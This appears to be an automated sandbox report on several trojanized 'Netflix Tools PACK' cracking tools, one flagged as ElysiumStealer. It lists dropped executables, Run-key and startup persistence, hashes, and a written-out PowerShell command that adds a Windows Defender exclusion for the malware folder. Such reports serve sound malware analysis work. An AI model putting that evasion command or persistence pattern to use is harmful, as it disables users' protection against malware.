Platform
win10v2004-20230621-en
Max time kernel
24s
Max time network
16s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
Files
memory/1312-133-0x00000000008A0000-0x00000000008B4000-memory.dmp
memory/1312-134-0x00000000058E0000-0x0000000005E84000-memory.dmp
memory/1312-135-0x0000000005170000-0x0000000005202000-memory.dmp
memory/1312-136-0x0000000005140000-0x000000000514A000-memory.dmp
memory/1312-137-0x0000000005320000-0x0000000005330000-memory.dmp
memory/1312-138-0x0000000006820000-0x000000000689E000-memory.dmp
memory/1312-139-0x0000000005320000-0x0000000005330000-memory.dmp
memory/3520-140-0x0000000000DF0000-0x0000000000E26000-memory.dmp
memory/3520-141-0x0000000004C90000-0x00000000052B8000-memory.dmp
memory/3520-142-0x0000000000E30000-0x0000000000E40000-memory.dmp
memory/3520-143-0x0000000000E30000-0x0000000000E40000-memory.dmp
memory/3520-144-0x00000000053C0000-0x00000000053E2000-memory.dmp
memory/3520-150-0x0000000005460000-0x00000000054C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujoxm4k5.agu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3520-151-0x0000000005540000-0x00000000055A6000-memory.dmp
memory/3520-156-0x0000000005B40000-0x0000000005B5E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/1312-178-0x0000000006560000-0x00000000065D6000-memory.dmp
memory/1312-179-0x0000000006540000-0x000000000655E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2436-194-0x0000000000F20000-0x0000000000F32000-memory.dmp
memory/3520-195-0x0000000006100000-0x0000000006132000-memory.dmp
memory/3520-196-0x000000006F8F0000-0x000000006F93C000-memory.dmp
memory/2436-198-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/3520-199-0x0000000000E30000-0x0000000000E40000-memory.dmp
memory/3520-209-0x000000007F3F0000-0x000000007F400000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/3520-210-0x0000000004890000-0x00000000048AE000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/4212-214-0x00000000001A0000-0x00000000001B2000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/3520-217-0x00000000074B0000-0x0000000007B2A000-memory.dmp
memory/3520-218-0x0000000006E50000-0x0000000006E6A000-memory.dmp
memory/4212-219-0x0000000002330000-0x0000000002340000-memory.dmp
memory/3520-220-0x0000000006EC0000-0x0000000006ECA000-memory.dmp
memory/3520-221-0x00000000070D0000-0x0000000007166000-memory.dmp
memory/3520-222-0x0000000007080000-0x000000000708E000-memory.dmp
memory/3520-223-0x0000000007190000-0x00000000071AA000-memory.dmp
memory/3520-224-0x0000000007170000-0x0000000007178000-memory.dmp
memory/2436-227-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/4212-228-0x0000000002330000-0x0000000002340000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
33s
Max time network
17s
Command Line
Signatures
ElysiumStealer
ElysiumStealer Support DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\NetFlix_Shitter_V3.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\NetFlix_Shitter_V3.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\NetFlix_Shitter_V3.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5024 -ip 5024
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 1092
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 254.5.248.8.in-addr.arpa | udp |
Files
memory/1128-133-0x00000000008F0000-0x0000000000920000-memory.dmp
memory/1128-134-0x0000000005240000-0x00000000052DC000-memory.dmp
memory/1128-135-0x00000000058D0000-0x0000000005E74000-memory.dmp
memory/1128-136-0x00000000053C0000-0x0000000005452000-memory.dmp
memory/1128-137-0x0000000005360000-0x000000000536A000-memory.dmp
memory/1128-138-0x0000000005600000-0x0000000005656000-memory.dmp
memory/1128-139-0x0000000005230000-0x0000000005240000-memory.dmp
memory/4168-140-0x0000000000C60000-0x0000000000C74000-memory.dmp
memory/4168-141-0x0000000005730000-0x0000000005740000-memory.dmp
memory/4168-142-0x0000000006B90000-0x0000000006C0E000-memory.dmp
memory/4168-143-0x0000000005730000-0x0000000005740000-memory.dmp
memory/5024-145-0x0000000000A00000-0x0000000000C04000-memory.dmp
memory/4120-146-0x00000000026A0000-0x00000000026D6000-memory.dmp
memory/4120-147-0x0000000005240000-0x0000000005868000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Runtime.MSIL.1.0.0.0\NativePRo.dll
| MD5 | 94173de2e35aa8d621fc1c4f54b2a082 |
| SHA1 | fbb2266ee47f88462560f0370edb329554cd5869 |
| SHA256 | 7e2c70b7732fb1a9a61d7ce3d7290bc7b31ea28cbfb1dbc79d377835615b941f |
| SHA512 | cadbf4db0417283a02febbabd337bf17b254a6eb6e771f8a553a140dd2b04efd0672b1f3175c044a3edd0a911ce59d6695f765555262560925f3159bb8f3b798 |
memory/4120-152-0x0000000005130000-0x0000000005152000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lycggo3h.uox.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4120-162-0x00000000059F0000-0x0000000005A56000-memory.dmp
memory/4120-163-0x0000000005AE0000-0x0000000005B46000-memory.dmp
memory/5024-164-0x00000000054D0000-0x00000000054E0000-memory.dmp
memory/4120-165-0x0000000002880000-0x0000000002890000-memory.dmp
memory/4120-166-0x0000000002880000-0x0000000002890000-memory.dmp
memory/4120-167-0x0000000005FC0000-0x0000000005FDE000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4168-189-0x0000000006770000-0x00000000067E6000-memory.dmp
memory/4168-190-0x0000000006750000-0x000000000676E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4760-205-0x0000000000620000-0x0000000000632000-memory.dmp
memory/4760-206-0x00000000029D0000-0x00000000029E0000-memory.dmp
memory/4120-207-0x0000000002880000-0x0000000002890000-memory.dmp
memory/4120-208-0x00000000065A0000-0x00000000065D2000-memory.dmp
memory/4120-209-0x000000006FC70000-0x000000006FCBC000-memory.dmp
memory/4120-219-0x0000000006580000-0x000000000659E000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/4120-224-0x0000000007970000-0x0000000007FEA000-memory.dmp
memory/4120-226-0x00000000072F0000-0x000000000730A000-memory.dmp
memory/5040-225-0x00000000009F0000-0x0000000000A02000-memory.dmp
memory/4120-229-0x0000000007350000-0x000000000735A000-memory.dmp
memory/5040-230-0x00000000052F0000-0x0000000005300000-memory.dmp
memory/4120-231-0x000000007FC40000-0x000000007FC50000-memory.dmp
memory/4120-232-0x0000000007560000-0x00000000075F6000-memory.dmp
memory/4120-233-0x0000000007510000-0x000000000751E000-memory.dmp
memory/4120-234-0x0000000007620000-0x000000000763A000-memory.dmp
memory/4120-235-0x0000000007600000-0x0000000007608000-memory.dmp
memory/4760-238-0x00000000029D0000-0x00000000029E0000-memory.dmp
memory/5040-239-0x00000000052F0000-0x0000000005300000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
33s
Max time network
28s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\ttdinject.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\ttdinject.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
28s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe"
